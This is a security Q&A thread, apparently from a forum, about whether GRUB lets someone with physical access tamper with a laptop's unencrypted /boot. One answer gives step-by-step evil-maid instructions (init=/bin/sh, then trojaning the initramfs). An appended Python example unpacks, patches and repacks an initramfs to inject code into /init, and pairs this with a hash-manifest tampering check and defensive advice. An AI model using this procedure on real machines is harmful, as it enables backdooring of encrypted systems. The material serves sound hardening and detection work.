
I am trying to find out how far I can secure my laptop from physical access and tampering attempts.

Setup: ThinkPad with Linux installation

What I have done so far:

  • disk encryption using cryptsetup for everything except /boot
  • entering UEFI setup menu is protected by supervisor password
  • all boot devices are disabled except primary SSD with Linux installation
  • Bottom cover tamper detection is enabled

Due to the disk encryption, it is not possible to access the data without tampering with the device to sniff the password. Implanting a hardware keylogger should be very hard due to Lenovo's bottom cover tamper detection, which warns me when the cover has been removed. Booting a live system to modify the unencrypted /boot partition is not possible because all other boot devices are disabled. Changing the respective settings in UEFI is not possible due to the supervisor password.

But the attacker is able to boot the system until the GRUB bootloader appears. Does GRUB offer any possibilities to tamper with the unencrypted /boot partition?

firefexx
  • I think you can set a power-on (aka user) password from the setup menu. That makes the BIOS ask for a password before reading the MBR on the disk. – Batuhan Mar 16 '15 at 09:31

2 Answers


I recommend locking down GRUB and taking away access to the GRUB shell.

GRUB manual: Authentication and authorisation (Archived here.)

By default, the boot loader interface is accessible to anyone with physical access to the console: anyone can select and edit any menu entry, and anyone can get direct access to a GRUB shell prompt. For most systems, this is reasonable since anyone with direct physical access has a variety of other ways to gain full access, and requiring authentication at the boot loader level would only serve to make it difficult to recover broken systems.

Otherwise somebody might access the GRUB shell and just use the "chainloader" command to boot into another partition's partition boot record (possibly off of a USB drive).

ArchWiki entry on GRUB (Archived here.)

The GRUB's command shell environment can be used to boot operating systems. A common scenario may be to boot Windows / Linux stored on a drive/partition via chainloading.

I haven't tried any of this. But it sounds dangerous enough.

StackzOfZtuff

GRUB itself does not let you modify /boot, but it does allow you to boot into a rescue shell in the unencrypted initramfs in /boot, which does.

While GRUB itself does not provide much ability to tamper with /boot, it will allow you to boot into single-user mode with a rescue shell. Your /boot contains the bootloader, along with your kernel and the initramfs (initial RAM filesystem). The initramfs contains misc tools required to boot, as well as tools useful in a rescue environment, such as busybox to provide a lightweight alternative to GNU coreutils, and a shell such as ash. An attacker would simply use GRUB to boot into a rescue shell in your initramfs, which is usually possible by appending init=/bin/sh to the kernel/linux option. This overrides the default init script (/init) and instead tells the initramfs to give you an interactive shell. From there, he could mount /boot and modify it to his heart's content. This is completely possible because all he needs is editing tools (the initramfs contains all useful coreutils, as well as text editors like ed and vi) and the tools needed to unpack and repack the initramfs (cpio, which is like tar, and a compression tool like xz or gzip).

If I wanted to attack your laptop, the process would look a little like this:

  1. Boot into a GRUB shell, manually set the kernel and the initramfs, and append init=/bin/sh

  2. Create /mnt/boot and mount the unencrypted boot partition to it.

  3. Decrypt the initramfs and unpack it with cpio into a temporary directory.

  4. Modify the init script to do evil things, like add a backdoor to your root filesystem after you decrypt.

  5. Repack the initramfs with cpio and recompress it.

  6. Overwrite the old initramfs with the trojaned one, power off, and walk away.

forest
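The unpack/patch/repack procedure in the answer above, as an added example that is not part of the original post and not taken from any distribution's initramfs tooling. To run offline it implements the cpio "newc" format itself (the format `find . | cpio -o -H newc` writes) instead of calling the cpio and gzip binaries, and it also handles the real-world layout of a concatenated image (an uncompressed early CPU-microcode cpio followed by a gzip'ed main cpio), which a plain `cpio -i` run on the whole file does not. The initramfs, its /init script, the partition names and the payload are constructed for the example. Alongside the attacker's step it shows the check a defender can run from the booted system: a per-member SHA-256 manifest of /boot's initramfs, which flags the modified /init.

```python
"""Added example: unpack, patch and repack an initramfs (newc cpio, gzip'ed),
then detect the change with a hash manifest. The image below is constructed
for the example; it is not a real distribution initramfs."""
import gzip
import hashlib
import io

CPIO_MAGIC = b"070701"   # SVR4 "newc" ASCII header magic
TRAILER = "TRAILER!!!"   # name of the terminating entry
HEADER_LEN = 110         # 6 magic bytes + 13 fields of 8 hex digits


def _pad4(n):
    """NUL padding needed to reach the next 4-byte boundary."""
    return (4 - n % 4) % 4


def _write_entry(out, ino, name, mode, data):
    name_b = name.encode() + b"\0"
    # ino mode uid gid nlink mtime filesize devmajor devminor rdevmajor rdevminor namesize check
    fields = [ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
    out.write(CPIO_MAGIC + b"".join(b"%08x" % f for f in fields))
    out.write(name_b + b"\0" * _pad4(HEADER_LEN + len(name_b)))
    out.write(data + b"\0" * _pad4(len(data)))


def cpio_pack(entries):
    """{path: (mode, bytes)} -> newc archive bytes."""
    out = io.BytesIO()
    for ino, (name, (mode, data)) in enumerate(entries.items(), start=1):
        _write_entry(out, ino, name, mode, data)
    _write_entry(out, 0, TRAILER, 0, b"")
    return out.getvalue()


def cpio_unpack(blob):
    """Parse one newc archive -> ({path: (mode, bytes)}, bytes_consumed)."""
    entries, pos = {}, 0
    while True:
        if blob[pos:pos + 6] != CPIO_MAGIC:
            raise ValueError("bad cpio header at offset %d" % pos)
        f = [int(blob[pos + 6 + 8 * i:pos + 14 + 8 * i], 16) for i in range(13)]
        mode, size, namesize = f[1], f[6], f[11]
        pos += HEADER_LEN
        name = blob[pos:pos + namesize - 1].decode()
        pos += namesize + _pad4(HEADER_LEN + namesize)
        data = blob[pos:pos + size]
        pos += size + _pad4(size)
        if name == TRAILER:
            return entries, pos
        entries[name] = (mode, data)


def unpack_initramfs(image):
    """Walk concatenated archives: uncompressed early cpio(s), then a gzip'ed one."""
    entries = {}
    while image:
        if image[:2] == b"\x1f\x8b":      # gzip member: inflate the remainder
            image = gzip.decompress(image)
        if image[:6] != CPIO_MAGIC:
            break                          # trailing block padding / unknown compressor
        segment, used = cpio_unpack(image)
        entries.update(segment)
        image = image[used:].lstrip(b"\0")
    return entries


def pack_initramfs(entries):
    return gzip.compress(cpio_pack(entries))


def inject_into_init(entries, payload):
    """Attacker step: run PAYLOAD in /init just before switch_root, i.e. after
    the user has typed the passphrase and the root filesystem is mounted."""
    mode, init = entries["init"]
    marker = b"\nexec switch_root"
    assert marker in init, "init script does not hand over via switch_root"
    entries["init"] = (mode, init.replace(marker, b"\n" + payload + marker, 1))
    return entries


def manifest(entries):
    """Defender step: per-member SHA-256, to be stored on the encrypted root."""
    return {n: hashlib.sha256(d).hexdigest() for n, (_, d) in entries.items()}


def verify(entries, trusted):
    """Compare an initramfs against a trusted manifest; [] means clean."""
    cur = manifest(entries)
    problems = [(n, "missing") for n in trusted if n not in cur]
    problems += [(n, "modified") for n in trusted if n in cur and cur[n] != trusted[n]]
    problems += [(n, "added") for n in cur if n not in trusted]
    return sorted(problems)


# Constructed sample image (device names and contents are made up for the example).
SAMPLE_INIT = b"""#!/bin/sh
mount -t proc proc /proc
cryptsetup open /dev/sda2 cryptroot
mount /dev/mapper/cryptroot /newroot
exec switch_root /newroot /sbin/init
"""
SAMPLE_MAIN = {"init": (0o100755, SAMPLE_INIT),
               "bin/busybox": (0o100755, b"\x7fELF placeholder")}
SAMPLE_EARLY = {"kernel/x86/microcode/GenuineIntel.bin": (0o100644, b"\x01" * 16)}


def demo():
    image = cpio_pack(SAMPLE_EARLY) + pack_initramfs(SAMPLE_MAIN)
    trusted = manifest(unpack_initramfs(image))      # taken while /boot is known-good
    tampered = inject_into_init(unpack_initramfs(image),
                                b"echo owned > /newroot/tmp/.marker")
    main = {k: v for k, v in tampered.items() if k not in SAMPLE_EARLY}
    new_image = cpio_pack(SAMPLE_EARLY) + pack_initramfs(main)
    return verify(unpack_initramfs(new_image), trusted)


if __name__ == "__main__":
    print(demo())   # [('init', 'modified')]
```

Two caveats on the defender half. The manifest must live on the encrypted root (or be signed), because anything stored on /boot can be rewritten by the same attacker who rewrote the initramfs. And a check run from the booted system is only detection after the fact: by then the possibly trojaned /init has already run with the root unlocked. Preventing the attack rather than noticing it needs an integrity anchor below GRUB, such as Secure Boot with a signed kernel plus initramfs (a unified kernel image) or keeping /boot inside the LUKS volume, which GRUB can unlock itself.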